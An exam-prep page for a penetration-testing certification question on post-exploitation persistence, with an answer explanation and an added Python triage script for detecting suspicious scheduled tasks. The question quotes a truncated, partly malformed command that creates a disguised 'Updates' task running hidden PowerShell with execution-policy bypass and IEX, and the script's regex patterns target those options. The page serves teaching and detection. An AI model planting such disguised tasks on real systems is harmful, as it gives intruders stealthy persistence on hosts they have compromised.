PT0-003 Question #254: Real Exam Question with Answer & Explanation

Submitted by miguelv · Mar 6, 2026 · Post-exploitation and Lateral Movement

Question

A tester obtained access to a computer using an SMB exploit and now has shell access to the target computer. The tester runs the following on the obtained shell:

schtask /create /tn Updates /tr "C:\windows\syswow64\Windows\WindowsPowershell\v1.0\powershell.exe hidden -NoLogo -NoInteractive -ep bypass -nop -c 'IEX ((new-object /ru System

Which of the following does this action accomplish?

Options

  • A. Upgrades the shell performing a privilege escalation activity
  • B. Uses the Windows Update service to move the shell connection and avoid detection
  • C. Maintains access into the compromised computer
  • D. Forwards all the communication from the compromised host to the host 10.10.1.2

Explanation

Option C is correct because schtasks /create creates a scheduled task (named "Updates" to blend in) that runs a PowerShell command with execution policy bypass. This is a classic persistence mechanism, ensuring the attacker regains access automatically even after a reboot or session termination.

Option A is wrong because scheduled tasks don't inherently elevate privileges; privilege escalation requires exploiting specific vulnerabilities or misconfigurations, not just scheduling a task.

Option B is incorrect because while the task is named "Updates" to mimic Windows Update activity, it does not actually use or interact with the Windows Update service in any way; the name is simply camouflage.

Option D is wrong because there is no port forwarding, tunneling, or redirection command in the syntax shown; forwarding traffic would require tools like netsh, socat, or SSH tunneling.

Memory Tip: Think "schtasks = Stay" - whenever you see schtasks /create in a post-exploitation context, the attacker's goal is to stay (persist) on the system. The disguised task name "Updates" is a red herring designed to fool you, but the function is always about maintaining that foothold.
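
From the defender's side, the same pattern can be triaged from process-creation command lines (for example Windows Security event 4688 with command-line auditing, or Sysmon event 1). The following is an added example, not part of the original question or explanation: the sample command lines are constructed, and the severity tiers and indicator names are assumptions chosen for illustration.

```python
import re

# Constructed process-creation command lines (not from the page or a real host).
SAMPLE_EVENTS = [
    r'schtasks /create /tn "NightlyBackup" /tr "C:\Tools\backup.exe" /sc daily /st 02:00',
    r'''schtasks /create /tn Updates /tr "powershell.exe -w hidden -ep bypass -nop -c 'IEX (<elided>)'" /sc onstart /ru System''',
    r'schtasks /create /tn "PatchReport" /tr "powershell.exe -NoProfile -File C:\Scripts\report.ps1" /sc weekly /ru SYSTEM',
    r'schtasks /query /fo list',
]

TASK_CREATE = re.compile(r'\bschtasks(?:\.exe)?\b.*?/create\b', re.I)
TASK_NAME = re.compile(r'/tn\s+("[^"]+"|\S+)', re.I)
CONTEXT = {   # worth a look, but also common in legitimate admin tasks
    "runs_as_system": re.compile(r'/ru\s+"?(?:nt authority\\)?system\b', re.I),
    "powershell_action": re.compile(r'/tr\s+.*powershell(?:\.exe)?', re.I),
    "no_profile": re.compile(r'-nop(?:rofile)?\b', re.I),
}
EVASION = {   # options from the question's command that hide or bypass controls
    "policy_bypass": re.compile(r'-e(?:p|x\w*)\s+bypass\b', re.I),
    "hidden_window": re.compile(r'\bhidden\b', re.I),
    "inline_iex": re.compile(r'\b(?:iex|invoke-expression)\b', re.I),
}

def classify(cmdline):
    """Return None for non-creation commands, else task name, hits and severity."""
    if not TASK_CREATE.search(cmdline):
        return None
    name = TASK_NAME.search(cmdline)
    context = [k for k, rx in CONTEXT.items() if rx.search(cmdline)]
    evasion = [k for k, rx in EVASION.items() if rx.search(cmdline)]
    if "powershell_action" in context and evasion:
        severity = "high"      # PowerShell task action plus hiding/bypass options
    elif context:
        severity = "review"    # privileged or scripted task, no evasion options
    else:
        severity = "info"
    return {"task": name.group(1).strip('"') if name else None,
            "hits": context + evasion, "severity": severity}

def triage(events):
    """Classify every task-creation event, highest severity first."""
    order = {"high": 0, "review": 1, "info": 2}
    results = [r for r in map(classify, events) if r]
    return sorted(results, key=lambda r: order[r["severity"]])

if __name__ == "__main__":
    for result in triage(SAMPLE_EVENTS):
        print(result)
```

The "PatchReport" sample shows why a task that runs PowerShell as SYSTEM is not enough for a high-severity alert on its own: the combination with hidden-window, policy-bypass or inline-expression options is what separates the question's command from routine administration.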

Topics

#Persistence #Scheduled tasks #PowerShell #Post-exploitation
